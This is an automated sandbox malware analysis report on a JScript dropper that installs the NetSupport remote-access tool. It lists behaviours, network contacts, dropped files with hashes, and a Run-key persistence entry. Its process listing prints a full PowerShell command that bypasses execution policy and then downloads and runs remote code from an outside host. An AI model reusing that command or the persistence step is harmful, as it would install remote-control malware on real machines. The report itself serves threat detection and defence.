Malware Analysis Report

2024-10-19 01:40

Sample ID 240207-lh41eafdg6
Target ARS17291729317291729.js
SHA256 2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b
Tags
netsupport persistence rat
score
10/10

Analysis Overview

score
10/10

SHA256

2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b

Threat Level: Known bad

The file ARS17291729317291729.js was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-07 09:32

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-07 09:32

Reported

2024-02-07 09:35

Platform

win10v2004-20231222-en

Max time kernel

92s

Max time network

140s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco [encoded command not preserved in this report]

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
US 8.8.8.8:53 sakaleralo.com udp
DE 192.121.22.184:80 sakaleralo.com tcp
US 8.8.8.8:53 106.225.43.67.in-addr.arpa udp
US 8.8.8.8:53 184.22.121.192.in-addr.arpa udp
IN 13.71.55.58:443 N/A tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 N/A udp
IN 13.71.55.58:443 N/A tcp
IN 13.71.55.58:443 N/A tcp
US 8.8.8.8:53 N/A udp
US 8.8.8.8:53 N/A udp
US 8.8.8.8:53 N/A udp
GB 5.61.62.93:443 N/A tcp
US 172.67.68.212:80 N/A tcp
US 8.8.8.8:53 N/A udp
US 8.8.8.8:53 N/A udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iisg2x4g.xib.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

MD5 a2b46c59f6e7e395d479b09464ecdba0
SHA1 92c132307dd21189b6d7912ddd934b50e50d1ec1
SHA256 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA512 4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

MD5 8dd6ae67fced06599dd0643d18395338
SHA1 5972dae148c3ee037c3228d9797ef7bd054229fa
SHA256 74cc09260f7c2bc0e2022ec43eda5648023e02b2bc752a1808e1ef5b0d7695a6
SHA512 a7c5f12fcafaab7d9faa5045c5561465389f1c6e349292fa178d309ee60df00a01b7c7e5c5241373a7174a73700f92ff8fd206e2bc90505e1f49d09bc4dc55ef

C:\Users\Admin\AppData\Local\modem_gprs_modules\msvcr100.dll

MD5 d36e2ebca79a97a3da7ae166355cb058
SHA1 862d93a5b3191efc72537af7a823345180483ca0
SHA256 09629d07055dd129387d8030e47f9f87be142938f7628ee16f3657ff3e7d408e
SHA512 be19f11682a5c47d0bcdfc7163aeb2825d119e797ad80bc2c2ab47a18632e3f833faf9fef3ae18d1410adad9e4f29291284ad0a2cbbe7450b7e81fc5a0264501

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 8685677d29cd28cd99365daba43bd91b
SHA1 c7f81001c1bffe138bedcb29f8695d0c32da2bcd
SHA256 6424c55ae5589e812f2233c0e579c78cce0a5b4dba9c52bd7d6f17a37575b924
SHA512 653e46604afa00e5594b90a50baab9fa3aefc79c56d5520031bbe423806f05211024b6c549d905a5bddebda5ae94af63bb18fdf759774b491ac5f00f43a1092a

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 28c8a8263249e68e073b7e07ea790233
SHA1 6229b94354c6a8c5b55607c999a61184e8134c72
SHA256 9479a76792083c185382ff937028d2eb4bb0b8fe7051bc812e8d8c2bd747b5cd
SHA512 ec69ab6c56feeb735661d009576176983911682edc352bb666a6b746641537468d0e4c75ac7371fcf1dd28358d139a8c517692293a17bb492ac8ed3174ebb674

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

MD5 2cd1a8115b7328756129052384e2eed6
SHA1 9458e9553d3d1f075ed09a06fda3f36136781704
SHA256 02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512 df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

MD5 866c96ba2823ac5fe70130dfaaa08531
SHA1 892a656da1ea264c73082da8c6e5f5728abcb861
SHA256 6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA512 0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 512c6cab650bfda6ef2995f6b515ed6f
SHA1 fec40abf4f5d74ea7f8828cee83770e423203083
SHA256 84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512 638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f6a3762a04bbb03336fb66a040afb97
SHA1 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512 cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

C:\Users\Admin\AppData\Local\modem_gprs_modules\MSVCR100.dll

MD5 4054ad31323fe183a5beff36509e5886
SHA1 bcdc25fffb6e1be98c44e60b33556d5e7bf94747
SHA256 aa3543e079d8cd6dfff32b842e87dc35916b63cab928697205ffa4059fdd2320
SHA512 3a26d685a36c4eedbba4777db883a2331743aaba629104d83b753500e986831cb0153f379207f5aec100f0b8d89a673476d317c874be9d4ea76ad6f9d2408f2a

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Local\modem_gprs_modules\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.DLL

MD5 7937f859097b360b2cba516cf83ec59f
SHA1 ddc3a3c20ee7c406f312a8e1cbd4a5cbc0a5ee4e
SHA256 228a3ac9a4f0839c1fcd3e6208fe5c610928cac30ad38c1a19ac2af610fe0ca9
SHA512 ff89b4d531e7349eee60a75eedee1be6f2581a108669124c21c4a9a37cefd9dd081a65f3c24651cfae54a29a85b771ca02f162c390c9058ae307744244983115

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-07 09:32

Reported

2024-02-07 09:35

Platform

win7-20231215-en

Max time kernel

117s

Max time network

121s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
CA 67.43.225.106:443 assime.ca tcp

Files